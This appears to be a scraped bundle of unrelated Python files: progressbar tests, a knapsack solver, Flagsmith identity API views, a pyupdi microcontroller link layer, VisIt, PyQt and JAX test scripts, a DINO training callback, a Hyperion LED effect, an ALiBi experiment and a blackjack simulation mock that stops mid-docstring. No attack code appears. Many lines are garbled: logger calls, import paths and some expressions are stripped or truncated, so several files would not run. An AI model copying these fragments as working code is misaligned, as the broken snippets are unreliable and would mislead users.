<gh_stars>100-1000 import time import progressbar class CrazyFileTransferSpeed(progressbar.FileTransferSpeed): "It's bigger between 45 and 80 percent" def update(self, pbar): if 45 < pbar.percentage() < 80: return 'Bigger Now ' + progressbar.FileTransferSpeed.update(self, pbar) else: return progressbar.FileTransferSpeed.update(self, pbar) def test_crazy_file_transfer_speed_widget(): widgets = [ # CrazyFileTransferSpeed(), ' <<<', progressbar.Bar(), '>>> ', progressbar.Percentage(), ' ', progressbar.ETA(), ] p = progressbar.ProgressBar(widgets=widgets, max_value=1000) # maybe do something p.start() for i in range(0, 200, 5): # do something time.sleep(0.1) p.update(i + 1) p.finish() def test_variable_widget_widget(): widgets = [ ' [', progressbar.Timer(), '] ', progressbar.Bar(), ' (', progressbar.ETA(), ') ', progressbar.Variable('loss'), progressbar.Variable('text'), progressbar.Variable('error', precision=None), progressbar.Variable('missing'), progressbar.Variable('predefined'), ] p = progressbar.ProgressBar(widgets=widgets, max_value=1000, variables=dict(predefined='predefined')) p.start() print('time', time, time.sleep) for i in range(0, 200, 5): time.sleep(0.1) p.update(i + 1, loss=.5, text='spam', error=1) i += 1 p.update(i, text=None) i += 1 p.update(i, text=False) i += 1 p.update(i, text=True, error='a') p.finish() def test_format_custom_text_widget(): widget = progressbar.FormatCustomText( 'Spam: %(spam).1f kg, eggs: %(eggs)d', dict( spam=0.25, eggs=3, ), ) bar = progressbar.ProgressBar(widgets=[ widget, ]) for i in bar(range(5)): widget.update_mapping(eggs=i * 2) assert widget.mapping['eggs'] == bar.widgets[0].mapping['eggs']
<reponame>arslantalib3/algo_ds_101<filename>Algorithms/Dynamic_Programming/0-1_Knapsack_Problem/ #0/1 Knapsack problem def knapsack(val, wt, N, C): table = [[ 0 for _ in range(0, C+1)] for _ in range(0, N+1)] table[0][0] = 0 for i in range(1, N+1): for c in range(1, C+1): if c - wt[i-1] < 0: table[i][c] = table[i-1][c] else: table[i][c] = max(table[i-1][c], table[i-1][c-wt[i-1]]+val[i-1]) return table[N][C] N = int(input().strip()) W = int(input().strip()) # capacity val = [ int(v) for v in input().strip().split(" ")] wt = [ int(w) for w in input().strip().split(" ")] print(knapsack(val, wt, N, W))
import base64 import json import typing import marshmallow from boto3.dynamodb.conditions import Key from drf_yasg2.utils import swagger_auto_schema from flag_engine.api.schemas import APITraitSchema from import ( build_identity_dict, build_identity_model, ) from rest_framework import status, viewsets from rest_framework.decorators import action from rest_framework.exceptions import NotFound, ValidationError from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from app.pagination import EdgeIdentityPagination from edge_api.identities.serializers import ( EdgeIdentityFeatureStateSerializer, EdgeIdentityFsQueryparamSerializer, EdgeIdentitySerializer, EdgeIdentityTraitsSerializer, ) from environments.identities.models import Identity from environments.models import Environment from environments.permissions.constants import MANAGE_IDENTITIES from environments.permissions.permissions import NestedEnvironmentPermissions from features.permissions import IdentityFeatureStatePermissions from projects.exceptions import DynamoNotEnabledError from .exceptions import TraitPersistenceError trait_schema = APITraitSchema() class EdgeIdentityViewSet(viewsets.ModelViewSet): serializer_class = EdgeIdentitySerializer pagination_class = EdgeIdentityPagination lookup_field = "identity_uuid" dynamo_identifier_search_functions = { "EQUAL": lambda identifier: Key("identifier").eq(identifier), "BEGINS_WITH": lambda identifier: Key("identifier").begins_with(identifier), } def initial(self, request, *args, **kwargs): environment = self.get_environment_from_request() if not environment.project.enable_dynamo_db: raise DynamoNotEnabledError() super().initial(request, *args, **kwargs) def _get_search_function_and_value( self, search_query: str, ) -> typing.Tuple[typing.Callable, str]: if search_query.startswith('"') and search_query.endswith('"'): return self.dynamo_identifier_search_functions[ "EQUAL" ], search_query.replace('"', "") return self.dynamo_identifier_search_functions["BEGINS_WITH"], search_query def get_object(self): return Identity.dynamo_wrapper.get_item_from_uuid_or_404( self.kwargs["identity_uuid"] ) def get_queryset(self): page_size = self.pagination_class().get_page_size(self.request) previous_last_evaluated_key = self.request.GET.get("last_evaluated_key") search_query = self.request.query_params.get("q") start_key = None if previous_last_evaluated_key: start_key = json.loads(base64.b64decode(previous_last_evaluated_key)) if not search_query: return Identity.dynamo_wrapper.get_all_items( self.kwargs["environment_api_key"], page_size, start_key ) search_func, search_identifier = self._get_search_function_and_value( search_query ) identity_documents = Identity.dynamo_wrapper.search_items_with_identifier( self.kwargs["environment_api_key"], search_identifier, search_func, page_size, start_key, ) return identity_documents def get_permissions(self): return [ IsAuthenticated(), NestedEnvironmentPermissions( action_permission_map={ "retrieve": MANAGE_IDENTITIES, "get_traits": MANAGE_IDENTITIES, "update_traits": MANAGE_IDENTITIES, } ), ] def get_environment_from_request(self): """ Get environment object from URL parameters in request. """ return Environment.objects.get(api_key=self.kwargs["environment_api_key"]) def perform_destroy(self, instance): Identity.dynamo_wrapper.delete_item(instance["composite_key"]) @swagger_auto_schema( responses={200: EdgeIdentityTraitsSerializer(many=True)}, ) @action(detail=True, methods=["get"], url_path="list-traits") def get_traits(self, request, *args, **kwargs): identity = self.get_object() data = trait_schema.dump(identity["identity_traits"], many=True) return Response(data=data, status=status.HTTP_200_OK) @swagger_auto_schema( method="put", request_body=EdgeIdentityTraitsSerializer, responses={200: EdgeIdentityTraitsSerializer()}, ) @action(detail=True, methods=["put"], url_path="update-traits") def update_traits(self, request, *args, **kwargs): environment = self.get_environment_from_request() if not environment.project.organisation.persist_trait_data: raise TraitPersistenceError() identity = build_identity_model(self.get_object()) try: trait = trait_schema.load( except marshmallow.ValidationError as validation_error: raise ValidationError(validation_error) from validation_error identity.update_traits([trait]) Identity.dynamo_wrapper.put_item(build_identity_dict(identity)) data = trait_schema.dump(trait) return Response(data, status=status.HTTP_200_OK) class EdgeIdentityFeatureStateViewSet(viewsets.ModelViewSet): permission_classes = [IsAuthenticated, IdentityFeatureStatePermissions] lookup_field = "featurestate_uuid" serializer_class = EdgeIdentityFeatureStateSerializer # Patch is not supported http_method_names = [ "get", "post", "put", "delete", "head", "options", "trace", ] pagination_class = None def initial(self, request, *args, **kwargs): super().initial(request, *args, **kwargs) identity_document = Identity.dynamo_wrapper.get_item_from_uuid_or_404( self.kwargs["edge_identity_identity_uuid"] ) self.identity = build_identity_model(identity_document) def get_object(self): featurestate_uuid = self.kwargs["featurestate_uuid"] try: featurestate = next( filter( lambda fs: fs.featurestate_uuid == featurestate_uuid, self.identity.identity_features, ) ) except StopIteration: raise NotFound() return featurestate @swagger_auto_schema(query_serializer=EdgeIdentityFsQueryparamSerializer()) def list(self, request, *args, **kwargs): q_params_serializer = EdgeIdentityFsQueryparamSerializer( data=self.request.query_params ) q_params_serializer.is_valid(raise_exception=True) identity_features = self.identity.identity_features feature ="feature") if feature: identity_features = filter( lambda fs: == feature, identity_features ) serializer = self.get_serializer(identity_features, many=True) return Response(, status=status.HTTP_200_OK) def perform_destroy(self, instance): self.identity.identity_features.remove(instance) Identity.dynamo_wrapper.put_item(build_identity_dict(self.identity))
<reponame>leonerd/pyupdi """ Link layer in UPDI protocol stack """ import logging import time from updi.physical import UpdiPhysical import updi.constants as constants class UpdiDatalink(object): """ UPDI data link class handles the UPDI data protocol within the device """ def __init__(self, comport, baud): self.logger = logging.getLogger("link") # Create a UPDI physical connection self.use24bit=False self.updi_phy = UpdiPhysical(comport, baud) # Initialise self.init() # Check if not self.check(): # Send double break if all is not well, and re-check self.updi_phy.send_double_break() self.init() if not self.check(): raise Exception("UPDI initialisation failed") def set_24bit_updi(self, mode):"Using 24-bit updi") self.use24bit = mode def init(self): """ Set the inter-byte delay bit and disable collision detection """ self.stcs(constants.UPDI_CS_CTRLB, 1 << constants.UPDI_CTRLB_CCDETDIS_BIT) self.stcs(constants.UPDI_CS_CTRLA, 1 << constants.UPDI_CTRLA_IBDLY_BIT) def check(self): """ Check UPDI by loading CS STATUSA """ if self.ldcs(constants.UPDI_CS_STATUSA) != 0:"UPDI init OK") return True"UPDI not OK - reinitialisation required") return False def ldcs(self, address): """ Load data from Control/Status space """"LDCS from 0x{0:02X}".format(address)) self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LDCS | (address & 0x0F)]) response = self.updi_phy.receive(1) if len(response) != 1: # Todo - flag error return 0x00 return response[0] def stcs(self, address, value): """ Store a value to Control/Status space """"STCS 0x{0:02X} to 0x{1:02X}".format(value, address)) self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_STCS | (address & 0x0F), value]) def ld(self, address): """ Load a single byte direct from a 16/24-bit address """"LD from 0x{0:06X}".format(address)) if self.use24bit: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8, address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF]) else: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8, address & 0xFF, (address >> 8) & 0xFF]) return self.updi_phy.receive(1)[0] def ld16(self, address): """ Load a 16-bit word directly from a 16/24-bit address """"LD from 0x{0:06X}".format(address)) if self.use24bit: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16, address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF]) else: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16, address & 0xFF, (address >> 8) & 0xFF]) return self.updi_phy.receive(2) def st(self, address, value): """ Store a single byte value directly to a 16/24-bit address """"ST to 0x{0:06X}".format(address)) if self.use24bit: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8, address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF]) else: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8, address & 0xFF, (address >> 8) & 0xFF]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st") self.updi_phy.send([value & 0xFF]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st") def st16(self, address, value): """ Store a 16-bit word value directly to a 16/24-bit address """"ST to 0x{0:06X}".format(address)) if self.use24bit: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16, address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF]) else: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16, address & 0xFF, (address >> 8) & 0xFF]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st") self.updi_phy.send([value & 0xFF, (value >> 8) & 0xFF]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st") def ld_ptr_inc(self, size): """ Loads a number of bytes from the pointer location with pointer post-increment """"LD8 from ptr++") self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC | constants.UPDI_DATA_8]) return self.updi_phy.receive(size) def ld_ptr_inc16(self, words): """ Load a 16-bit word value from the pointer location with pointer post-increment """"LD16 from ptr++") self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC | constants.UPDI_DATA_16]) return self.updi_phy.receive(words << 1) def st_ptr(self, address): """ Set the pointer location """"ST to ptr") if self.use24bit: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_24, address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF]) else: self.updi_phy.send( [constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_16, address & 0xFF, (address >> 8) & 0xFF]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st_ptr") def st_ptr_inc(self, data): """ Store data to the pointer location with pointer post-increment """"ST8 to *ptr++") self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC | constants.UPDI_DATA_8, data[0]]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("ACK error with st_ptr_inc") n = 1 while n < len(data): self.updi_phy.send([data[n]]) response = self.updi_phy.receive(1) if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK: raise Exception("Error with st_ptr_inc") n += 1 def st_ptr_inc16(self, data): """ Store a 16-bit word value to the pointer location with pointer post-increment Disable acks when we do this, to reduce latency. """"ST16 to *ptr++") ctrla_ackon = 1 << constants.UPDI_CTRLA_IBDLY_BIT # with acks enabled. ctrla_ackoff = ctrla_ackon | (1 << constants.UPDI_CTRLA_RSD_BIT) # acks off. (RSD) # (Response signature disable) self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackoff) self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC | constants.UPDI_DATA_16] ) self.updi_phy.send(data) # No response expected. # Re-enable acks self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackon) def repeat(self, repeats): """ Store a value to the repeat counter """ if (repeats - 1) > constants.UPDI_MAX_REPEAT_SIZE: raise Exception("Invalid repeat count!")"Repeat {0:d}".format(repeats)) repeats -= 1 self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_REPEAT | constants.UPDI_REPEAT_BYTE, repeats & 0xFF]) def read_sib(self): """ Read the SIB """ return self.updi_phy.sib() def key(self, size, key): """ Write a key """"Writing key") if len(key) != 8 << size: raise Exception("Invalid KEY length!") self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_KEY | constants.UPDI_KEY_KEY | size]) self.updi_phy.send(list(reversed(list(key))))
# ---------------------------------------------------------------------------- # CLASSES: nightly # # Test Case: # # Tests: Transform manager's conversion to float # # Programmer: <NAME> # Date: September 24, 2006 # # Modifications: # # <NAME>, Wed Jan 20 07:37:11 PST 2010 # Added ability to swtich between Silo's HDF5 and PDB data. # ---------------------------------------------------------------------------- OpenDatabase(silo_data_path("quad_disk.silo")) # # Turn off force single precision for this test # readOptions=GetDefaultFileOpenOptions("Silo") readOptions["Force Single"] = 0 SetDefaultFileOpenOptions("Silo", readOptions) # # Test ordinary float data (no conversion) first # AddPlot("Mesh","mesh") DrawPlots() Test("float_xform_01") DeleteAllPlots() # # Ok, now read a mesh with double coords # AddPlot("Mesh","meshD") DrawPlots() Test("float_xform_02") DeleteAllPlots() CloseDatabase(silo_data_path("quad_disk.silo")) OpenDatabase(silo_data_path("quad_disk.silo")) # # test float data on a float mesh # AddPlot("Pseudocolor","sphElev_on_mesh") DrawPlots() Test("float_xform_03") DeleteAllPlots() # # test float data on a double mesh # AddPlot("Pseudocolor","sphElev_on_meshD") DrawPlots() Test("float_xform_04") DeleteAllPlots() # # test double data on a float mesh # AddPlot("Pseudocolor","sphElevD_on_mesh") DrawPlots() Test("float_xform_05") DeleteAllPlots() CloseDatabase(silo_data_path("quad_disk.silo")) OpenDatabase(silo_data_path("quad_disk.silo")) # # test double data on a double mesh # AddPlot("Pseudocolor","sphElevD_on_meshD") DrawPlots() Test("float_xform_06") DeleteAllPlots() Exit()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' from PyQt5.QtGui import QPixmap, QPainter, QFont from PyQt5.QtWidgets import QApplication, QLabel from PyQt5.QtCore import Qt, QRect app = QApplication([]) text = "Hello World!" pixmap = QPixmap(180, 130) pixmap.fill(Qt.white) painter = QPainter(pixmap) painter.setFont(QFont('Arial', 12)) rect = QRect(0, 0, 70, 50) painter.drawRect(rect) painter.drawText(rect, Qt.TextWordWrap, text) rect = QRect(0, 60, 70, 50) painter.drawRect(rect) painter.drawText(rect, Qt.AlignLeft, text) w = QLabel() w.setPixmap(pixmap) app.exec()
<reponame>yf225/alpa from functools import partial import jax from jax import lax import jax.numpy as jnp def debug_pmap(): @jax.pmap def func(x, w): return x @ w y = func(jnp.ones((2, 4)), jnp.ones((2, 4))) print(y, type(y)) def test_nested_pmap(): @partial(jax.pmap, axis_name='a0', in_axes=(0, None), out_axes=0) def add(a, b): # a.shape = (32, 64) # b.shape = (64, 2, 32) @partial(jax.pmap, axis_name='a1', in_axes=(None, 1), out_axes=1) def add_inner(x, y): # x.shape = (32, 64) # y.shape = (64, 32) return x @ y # ret.shape = (32, 2, 32) ret = add_inner(a, b) return ret a = jnp.ones((2, 32, 64)) b = jnp.ones((64, 2, 32)) #jaxpr = jax.make_jaxpr(add)(a, b) #print(jaxpr) #print(jaxpr.jaxpr.outvars[0].aval.shape) c = add(a, b) print(c) def test_allreduce_sum(): @partial(jax.pmap, axis_name='i') def normalize(x): return x / lax.psum(x, 'i') print(normalize(jnp.arange(2))) if __name__ == "__main__": #debug_pmap() #test_nested_pmap() test_allreduce_sum()
<gh_stars>100-1000 # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/15 - dino.ipynb (unless otherwise specified). __all__ = ['DINOHead', 'get_dino_aug_pipelines', 'DINOModel', 'DINO'] # Cell from import * from ..augmentations import * from ..layers import * from ..models.vision_transformer import * # Cell class DINOHead(nn.Module): ''' copy.deepcopy: RuntimeError: Only Tensors created explicitly by the user (graph leaves) support the deepcopy protocol at the moment ''' def __init__(self, in_dim, out_dim, use_bn=False, norm_last_layer=True, nlayers=3, hidden_dim=2048, bottleneck_dim=256): super().__init__() nlayers = max(nlayers, 1) if nlayers == 1: self.mlp = nn.Linear(in_dim, bottleneck_dim) else: layers = [nn.Linear(in_dim, hidden_dim)] if use_bn: layers.append(nn.BatchNorm1d(hidden_dim)) layers.append(nn.GELU()) for _ in range(nlayers - 2): layers.append(nn.Linear(hidden_dim, hidden_dim)) if use_bn: layers.append(nn.BatchNorm1d(hidden_dim)) layers.append(nn.GELU()) layers.append(nn.Linear(hidden_dim, bottleneck_dim)) self.mlp = nn.Sequential(*layers) self.apply(self._init_weights) self.last_layer = nn.utils.weight_norm(nn.Linear(bottleneck_dim, out_dim, bias=False)) if norm_last_layer: self.last_layer.weight_g.requires_grad = False def _init_weights(self, m): if isinstance(m, nn.Linear): trunc_normal_(m.weight, std=.02) if isinstance(m, nn.Linear) and m.bias is not None: nn.init.constant_(m.bias, 0) def forward(self, x): x = self.mlp(x) x = nn.functional.normalize(x, dim=-1, p=2) x = self.last_layer(x) return x # Cell @delegates(get_multi_aug_pipelines, but=['n', 'size', 'resize_scale']) def get_dino_aug_pipelines(num_crops=(2,4), crop_sizes=(224,96), min_scales=(0.4,0.05), max_scales=(1.,0.4), **kwargs): aug_pipelines = [] for nc, size, mins, maxs in zip(num_crops, crop_sizes, min_scales, max_scales): aug_pipelines += get_multi_aug_pipelines(n=nc, size=size, resize_scale=(mins,maxs), **kwargs) return aug_pipelines # Cell class DINOModel(Module): def __init__(self, student, teacher): "A module for loading and saving all training params together" self.student,self.teacher = student,teacher self.teacher.load_state_dict(student.state_dict()) for p in self.teacher.parameters(): p.requires_grad = False self.register_buffer('C', torch.zeros(1,num_features_model(teacher))) def forward(self,x): return self.student(x) # Cell class DINO(Callback): order,run_valid = 9,True def __init__(self, aug_pipelines, large_crop_ids=[0,1], cmom=0.9, tmom_start=0.996, tmom_end=1., tmom_sched=SchedCos, tpt_start=0.04, tpt_end=0.04, tpt_warmup_pct=0., tpt_sched=SchedLin, tps=0.1, freeze_last_layer=1, print_augs=False): """ DINO teacher student training with distillation. Refer to original repo: cmom: Center update momentum. tmom: Teacher update momentum. Set larger, e.g. 0.9995, for small batches or 0.996 for large batches (256+). tpt_warmup: Warm up starting temperature tpt_warmup_pct: Percentage of training for warmup tpt_sched: Warm up scheduler, e.g. SchedLin, SchedCos, SchedExp tpt: Teacher temperature after warm up. Decrease if training loss does not decrease. Smaller temperature means more sharpening. tps: Student temperature. freeze_last_layer: How many epochs to freeze the last layer """ store_attr('large_crop_ids,cmom,freeze_last_layer,tps') self.augs = aug_pipelines self.tpt_scheduler = combine_scheds([tpt_warmup_pct,1-tpt_warmup_pct], [tpt_sched(tpt_start,tpt_end),SchedNo(tpt_end,tpt_end)]) self.tmom_scheduler = tmom_sched(tmom_start, tmom_end) if print_augs: for aug in self.augs: print(aug) def before_fit(self): "Create teacher model as a copy of student" self.learn.loss_func = self.lf self.tpt = self.tpt_scheduler(0.) self.tmom = self.tmom_scheduler(0.) self.model.teacher.eval() for n,p in self.learn.model.student[1].last_layer.named_parameters(): if n == 'weight_v' : p.requires_grad = False def before_batch(self): "Augment multi crop views" = self.x.size(0) self.learn.xb = ([aug(self.x) for aug in self.augs],) x_large = [self.learn.xb[0][i] for i in self.large_crop_ids] # TODO: Do we need to put the teacher in eval(), not it original repo? with torch.no_grad(): targs = self.model.teacher(x_large) self.learn.yb = (targs,) self.cb = targs.mean(0, keepdim=True) def _momentum_update_teacher(self): for param_s, param_t in zip(self.learn.model.student.parameters(), self.model.teacher.parameters()): = * self.tmom + * (1. - self.tmom) def _momentum_update_center(self): self.model.C = self.model.C*self.cmom + self.cb*(1-self.cmom) def after_step(self): "Center and teacher updates" self._momentum_update_teacher(); self._momentum_update_center() def after_epoch(self): "Update tpt at the end of each epoch" self.tpt = self.tpt_scheduler(self.pct_train) self.tmom = self.tmom_scheduler(self.pct_train) if self.epoch == self.freeze_last_layer: print("Setting last layer to trainable") for n,p in self.learn.model.student[1].last_layer.named_parameters(): if n == 'weight_v' : p.requires_grad = True def lf(self, pred, *yb): "Multi crop cross entropy loss: -qlog(p)" yb = yb[0] pred = F.log_softmax(pred / self.tps, dim=-1) yb = F.softmax((yb - self.model.C) / self.tpt, dim=-1) n_targs, n_preds = yb.size(0)//, pred.size(0)// yb, pred = yb.chunk(n_targs), pred.chunk(n_preds) loss, npairs = 0, n_targs*(n_preds-1) for ti in range(n_targs): for pi in range(n_preds): if ti != pi: loss += (-yb[ti]*pred[pi]).sum(-1).mean() / npairs return loss @torch.no_grad() def show(self, n=1): xbs = self.learn.xb[0] idxs = np.random.choice(range(, n, False) images = [aug.decode('cpu').clone()).clamp(0, 1)[i] for i in idxs for xb, aug in zip(xbs, self.augs)] return show_batch(images[0], None, images, max_n=len(images), nrows=n)
import hyperion import time import colorsys # Get the parameters rotationTime = float(hyperion.args.get('rotation-time', 2.0)) colorOne = hyperion.args.get('color_one', (255,0,0)) colorTwo = hyperion.args.get('color_two', (0,0,255)) colorsCount = hyperion.args.get('colors_count', hyperion.ledCount/2) reverse = bool(hyperion.args.get('reverse', False)) # Check parameters rotationTime = max(0.1, rotationTime) colorsCount = min(hyperion.ledCount/2, colorsCount) # Initialize the led data hsv1 = colorsys.rgb_to_hsv(colorOne[0]/255.0, colorOne[1]/255.0, colorOne[2]/255.0) hsv2 = colorsys.rgb_to_hsv(colorTwo[0]/255.0, colorTwo[1]/255.0, colorTwo[2]/255.0) colorBlack = (0,0,0) ledData = bytearray() for i in range(hyperion.ledCount): if i <= colorsCount: rgb = colorsys.hsv_to_rgb(hsv1[0], hsv1[1], hsv1[2]) elif (i >= hyperion.ledCount/2-1) & (i < (hyperion.ledCount/2) + colorsCount): rgb = colorsys.hsv_to_rgb(hsv2[0], hsv2[1], hsv2[2]) else: rgb = colorBlack ledData += bytearray((int(255*rgb[0]), int(255*rgb[1]), int(255*rgb[2]))) # Calculate the sleep time and rotation increment increment = 3 sleepTime = rotationTime / hyperion.ledCount while sleepTime < 0.05: increment *= 2 sleepTime *= 2 increment %= hyperion.ledCount # Switch direction if needed if reverse: increment = -increment # Start the write data loop while not hyperion.abort(): hyperion.setColor(ledData) ledData = ledData[-increment:] + ledData[:-increment] time.sleep(sleepTime)
""" --- title: Attention with Linear Biases (ALiBi) Experiment summary: This experiment trains an Attention with Linear Biases (ALiBi) based model on Tiny Shakespeare dataset. --- # [Attention with Linear Biases (ALiBi)](index.html) Experiment This is an annotated PyTorch experiment to train a [ALiBi model](index.html). This is based on [our GPT model](../gpt/index.html). [![View Run](]( """ import torch from import DataLoader from labml import experiment, tracker from labml.configs import option, calculate from labml_helpers.datasets.text import SequentialUnBatchedDataset from labml_nn.transformers.alibi import AlibiMultiHeadAttention from labml_nn.experiments.nlp_autoregression import transpose_batch from labml_nn.transformers import TransformerConfigs from labml_nn.transformers.gpt import Configs as GPTConfigs class Configs(GPTConfigs): """ ## Configurations We extend [GPT configurations](../gpt/index.html) and change the attention mechanism. """ # ALiBi based transformer (defined below) transformer: TransformerConfigs = 'GPT_ALiBi' # Longer validation set valid_seq_len: int = 128 valid_loader = 'shuffled_longer_valid_loader' def other_metrics(self, output: torch.Tensor, target: torch.Tensor): """ Log losses at the initial and final tokens """ # If there are more tokens that the training sequence length (during validation), if self.seq_len < output.shape[0]: # Log the loss at training sequence length tracker.add(f'loss.{self.seq_len - 1}.', self.loss_func(output[self.seq_len - 1], target[self.seq_len - 1])) # Log the loss at the first token tracker.add(f'loss.0.', self.loss_func(output[0], target[0])) # Log the loss at the final token tracker.add(f'loss.{int(output.shape[0]) - 1}.', self.loss_func(output[-1], target[-1])) def _alibi_mha(c: TransformerConfigs): """ Create an ALiBi attention module """ return AlibiMultiHeadAttention(c.n_heads, c.d_model, dropout_prob=c.dropout) # Set all attention mechanisms to ALiBi calculate(TransformerConfigs.encoder_attn, 'alibi_mha', _alibi_mha) calculate(TransformerConfigs.decoder_attn, 'alibi_mha', _alibi_mha) calculate(TransformerConfigs.decoder_mem_attn, 'alibi_mha', _alibi_mha) @option(Configs.valid_loader) def shuffled_longer_valid_loader(c: Configs): """ Shuffled validation data loader with `valid_seq_len` sequence length """ return DataLoader(SequentialUnBatchedDataset(text=c.text.valid, dataset=c.text, seq_len=c.valid_seq_len), batch_size=c.batch_size, collate_fn=transpose_batch, shuffle=True) @option(Configs.transformer, 'GPT_ALiBi') def _transformer_configs(c: Configs): """ ### ALiBi based Transformer configurations """ # We use our # [configurable transformer implementation](../configs.html#TransformerConfigs) conf = TransformerConfigs() # Set the vocabulary sizes for embeddings and generating logits conf.n_src_vocab = c.n_tokens conf.n_tgt_vocab = c.n_tokens # GPT uses GELU activation for position wise feedforward conf.ffn.activation = 'GELU' # ALiBi doesn't use positional embeddings conf.src_embed = 'no_pos' conf.tgt_embed = 'no_pos' # Set all attention mechanisms to ALiBi conf.encoder_attn = 'alibi_mha' conf.decoder_attn = 'alibi_mha' conf.decoder_mem_attn = 'alibi_mha' # return conf def main(): # Create experiment experiment.create(name="gpt_alibi") # Create configs conf = Configs() # Override configurations experiment.configs(conf, { # Use character level tokenizer 'tokenizer': 'character', # Prompt separator is blank 'prompt_separator': '', # Starting prompt for sampling 'prompt': 'It is ', # Use Tiny Shakespeare dataset 'text': 'tiny_shakespeare', # 'text': 'tiny_shakespeare_no_split', # Use a context size of $128$ 'seq_len': 64, # Use a context size of $128$ 'valid_seq_len': 80, # Train for $32$ epochs 'epochs': 128, # Batch size $128$ 'batch_size': 128, # Switch between training and validation for $10$ times # per epoch 'inner_iterations': 10, # Transformer configurations 'transformer.d_model': 128, 'transformer.ffn.d_ff': 512, 'transformer.n_heads': 8, 'transformer.n_layers': 4, 'transformer.dropout': 0.1, }) # Set models for saving and loading experiment.add_pytorch_models({'model': conf.model}) # Start the experiment with experiment.start(): # Run training # if __name__ == '__main__': main()
<reponame>pauldevos/Mastering-Object-Oriented-Python-Second-Edition #!/usr/bin/env python3.7 """ Mastering Object-Oriented Python 2e Code Examples for Mastering Object-Oriented Python 2nd Edition Chapter 14. Example 1 -- simulation model. """ from dataclasses import dataclass, astuple, asdict, field from typing import Tuple, Iterator from pathlib import Path import csv # Mock Object Model # ===================== # A set of class hierarchies that we'll use for several examples. # The content is mostly mocks. class DealerRule: def __repr__(self) -> str: return f"{self.__class__.__name__}()" class Hit17(DealerRule): """Hits soft 17""" pass class Stand17(DealerRule): """Stands on soft 17""" pass class SplitRule: def __repr__(self) -> str: return f"{self.__class__.__name__}()" class ReSplit(SplitRule): """Simplistic resplit anything.""" pass class NoReSplit(SplitRule): """Simplistic no resplit.""" pass class NoReSplitAces(SplitRule): """One card only to aces; no resplit.""" pass @dataclass class Table: decks: int limit: int dealer: DealerRule split: SplitRule payout: Tuple[int, int] class PlayerStrategy: def __repr__(self) -> str: return f"{self.__class__.__name__}()" class SomeStrategy(PlayerStrategy): pass class AnotherStrategy(PlayerStrategy): pass class BettingStrategy: def __repr__(self) -> str: return f"{self.__class__.__name__}()" def bet(self) -> int: raise NotImplementedError("No bet method") def record_win(self) -> None: pass def record_loss(self) -> None: pass class Flat(BettingStrategy): pass class Martingale(BettingStrategy): pass class OneThreeTwoSix(BettingStrategy): pass @dataclass class Player: play: PlayerStrategy betting: BettingStrategy max_rounds: int init_stake: int rounds: int = field(init=False) stake: float = field(init=False) def __post_init__(self): self.reset() def reset(self) -> None: self.rounds = self.max_rounds self.stake = self.init_stake # A mock simulation which is built from the above mock objects. import random @dataclass class Simulate: """Mock simulation.""" table: Table player: Player samples: int def __iter__(self) -> Iterator[Tuple]: """Yield statistical samples.""" x, y = self.table.payout blackjack_payout = x / y for count in range(self.samples): self.player.reset() while self.player.stake > 0 and self.player.rounds > 0: self.player.rounds -= 1 outcome = random.random() if outcome < 0.579: self.player.stake -= 1 elif 0.579 <= outcome < 0.883: self.player.stake += 1 elif 0.883 <= outcome < 0.943: # a "push" pass else: # 0.943 <= outcome self.player.stake += blackjack_payout yield astuple(self.table) + astuple(self.player) def check(path: Path) -> None: """ 